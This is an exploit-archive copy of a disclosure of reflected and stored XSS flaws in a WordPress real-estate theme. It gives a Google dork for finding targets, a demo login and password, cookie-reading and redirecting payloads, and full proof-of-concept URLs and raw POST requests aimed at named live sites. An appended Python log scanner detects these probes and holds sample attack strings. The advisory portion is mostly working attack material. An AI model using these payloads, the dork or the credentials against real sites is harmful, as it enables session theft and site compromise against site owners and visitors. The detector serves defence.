Home Villas | Real Estate WordPress Theme v2.2 - Multiple Vulnerabilities

CVE             Category  Price  Severity
CVE-2021-24316  CWE-79    $500   High

Author        Risk  Exploitation Type  Date
exploitalert  High  Remote             2020-07-27
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070130

Below is a copy:

Home Villas | Real Estate WordPress Theme v2.2 - Multiple Vulnerabilities
[+] Exploit Title: Home Villas | Real Estate WordPress Theme v2.2 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/homevillas-real-estate/
[+] Date: 2020-07-24
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Chimp Studio [ https://chimpgroup.com ]
[+] Software Version: 2.2
[+] Software Link: https://themeforest.net/item/home-villa-real-estate-wordpress-theme/19446059
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] Unauthenticated Reflected and Authenticated Persistent XSS vulnerabilities were discovered in the Home Villas theme through version 2.2 for WordPress.

[i] Demo account @ houseplanng.com: pocuser / 1rNeg6x7fEDp (login / password)

[i] PoC property URL: https://houseplanng.com/properties/1-4/

[i] PoC Member Profile URL: https://houseplanng.com/members/poc-user/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> Vulnerable parameters: property_type, location, search_type, property_category, min-beds, min-bath, min-garage

[x] Unauthenticated Reflected XSS in /compare-properties/?type=5684&properties_ids=13[payload],88

[x] Authenticated Persistent XSS on Property page -> House Plan Summary text area

[x] Authenticated Persistent XSS on Member Profile page -> Biography text area



### [ Payloads: ]

[$] "><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru/`;//">

[$] "><img src=x onerror=(alert)(`VLAD\x20VECTOR`);(alert)(document.cookie);window.location='https://vladvector.ru/';>

[$] <Input/Autofocus/%0D*/Onfocus=(alert)(`VLD\x20VCTOR`);window.location=`https://vladvector.ru/`;>



### [ PoC Unauthenticated Reflected XSS with all vulnerable parameters: ]

[!] https://homevillas.chimpgroup.com/property-medium/?property_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_type`);//%22%3E&location=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`location`);//%22%3E&search_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`search_type`);//%22%3E&property_category=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_category`);//%22%3E&min-beds=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-beds`);//%22%3E&min-bath=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-bath`);//%22%3E&min-garage=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-garage`);//%22%3E&advanced_search=true

[!] GET /property-medium/?property_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_type`);//%22%3E&location=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`location`);//%22%3E&search_type=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`search_type`);//%22%3E&property_category=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`property_category`);//%22%3E&min-beds=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-beds`);//%22%3E&min-bath=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-bath`);//%22%3E&min-garage=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`min-garage`);//%22%3E&advanced_search=true HTTP/1.1
Host: homevillas.chimpgroup.com



### [ PoC Unauthenticated Reflected XSS in /compare-properties/: ]

[!] https://homevillas.chimpgroup.com/compare-properties/?type=5684&properties_ids=13%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://vladvector.ru/`;//%22%3Ex,88x

[!] GET /compare-properties/?type=5684&properties_ids=13%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://vladvector.ru/`;//%22%3Ex,88x HTTP/1.1
Host: homevillas.chimpgroup.com



### [ PoC Authenticated Persistent XSS -> Property page: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: houseplanng.com
Referer: https://houseplanng.com/ad-new-property/?
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------331731252912908677314128703645
Content-Length: 5012
Origin: https://houseplanng.com
Cookie: [cookies_here]

-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_gallery_images[0]"; filename="1.jpg"
Content-Type: image/png

OK
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_type"

house-plans
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_new_package_used"

on
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_package"

5703
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_phone_number_property"

PoC
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_category[parent]"

PoC
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[bedroom]"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[bathroom]"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[area]"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[storey]"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[depth]"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_cus_field[width]"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_title"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_desc"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_summary"

"><img src=x onerror=(alert)(`VLAD\x20VECTOR`);(alert)(document.cookie);window.location='https://vladvector.ru/';>
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="property_tags[]"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_price_options"

price
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_phone_number_property_frontend"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_price"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_price_type"

Offers in region of
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_video"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_virtual_tour"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="faq_title"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="faq_desc"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="faq_title"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="faq_desc"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="faq_counter"


-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_first_name"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_last_name"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_email"

[email protected]
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_phone_number"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_address"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_property_gateway"

WP_REM_WOOCOMMERCE_GATEWAY
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="wp_rem_buy_order_flag"

1
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="trans_id"

0
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="term_policy"

on
-----------------------------331731252912908677314128703645
Content-Disposition: form-data; name="action"

user_and_property_meta_save
-----------------------------331731252912908677314128703645--



### [ PoC Authenticated Persistent XSS -> Member Profile page: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: houseplanng.com
Referer: https://houseplanng.com/dashboard/?dashboard=account
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 455
Origin: https://houseplanng.com
Cookie: [cookies_here]

member_display_name=PoC+User&member_company_slug=poc-user&wp_rem_biography=%3CInput%2FAutofocus%2F%250D*%2FOnfocus%3D(alert)(%60VL%CE%9BD%5Cx20V%CE%9ECTOR%60)%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%2F%60%3B%3E&member_email=linabo5933%40invql.com&wp_rem_user_phone_number=1337&wp_rem_user_website=&wp_rem_user_facebook=&wp_rem_user_google_plus=&wp_rem_user_twitter=&wp_rem_user_linkedIn=&member_profile_image=&action=wp_rem_member_accounts_save
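As an added, defender-side example that is not part of the advisory, the following Python detector walks web-server access-log lines for the reflected parameters listed above (/property-medium/ and /compare-properties/) and a logged POST body for the stored ones (wp_rem_property_summary, wp_rem_biography), flagging values that decode to markup. The log lines, the body and the client addresses are constructed; double URL-encoding is collapsed before matching, and POST bodies only appear if a proxy or WAF records them.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters the advisory reports as reflected (GET) or stored (POST) unescaped.
VULN_PARAMS = {"property_type", "location", "search_type", "property_category",
               "min-beds", "min-bath", "min-garage", "properties_ids",
               "wp_rem_property_summary", "wp_rem_biography"}
# Markup fragments that never belong in a slug, id, count or biography value.
XSS_MARKERS = re.compile(r"[<>]|on\w+\s*=|javascript:", re.IGNORECASE)
# Common Log Format request line; the target carries the query string.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
def decode_fully(value, rounds=3):
    """Collapse repeated percent-encoding so %253C is still seen as '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(encoded):
    """Vulnerable parameter names whose decoded value carries markup; `encoded`
    is a URL query string or an x-www-form-urlencoded POST body."""
    hits = []
    for name, values in parse_qs(encoded, keep_blank_values=True).items():
        if name in VULN_PARAMS and any(XSS_MARKERS.search(decode_fully(v)) for v in values):
            hits.append(name)
    return sorted(hits)

def scan_log(lines):
    """Return (client ip, path, flagged params) for each access-log request that probes."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            target = urlsplit(m.group("target"))
            flagged = suspicious_params(target.query)
            if flagged:
                findings.append((m.group("ip"), target.path, flagged))
    return findings
# Constructed sample data (not from the advisory): RFC 5737 addresses, and a
# profile-save body as a request-logging proxy or WAF would record it.
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Jul/2020:10:15:01 +0000] "GET /property-medium/?property_type=%22%3E%3Cimg%20src=x%20onerror=(alert)(1)%3E&location=lagos HTTP/1.1" 200 5120',
    '198.51.100.4 - - [24/Jul/2020:10:16:12 +0000] "GET /compare-properties/?type=5684&properties_ids=13%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E,88 HTTP/1.1" 200 2210',
    '192.0.2.9 - - [24/Jul/2020:10:17:30 +0000] "GET /property-medium/?property_type=house-plans&min-beds=2&min-bath=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [24/Jul/2020:10:18:45 +0000] "GET /property-medium/?min-garage=%253Cimg%2520src%3Dx%2520onerror%3Dalert(1)%253E HTTP/1.1" 200 5120',
]
SAMPLE_BODY = ("member_display_name=PoC+User&wp_rem_biography=%3CInput%2FAutofocus%2F%250D*%2F"
               "Onfocus%3D(alert)(1)%3B%3E&member_email=poc%40example.com&action=wp_rem_member_accounts_save")
```

Running `scan_log(SAMPLE_LOG)` flags three of the four lines (the benign house-plans search passes), and `suspicious_params(SAMPLE_BODY)` flags wp_rem_biography.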



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector
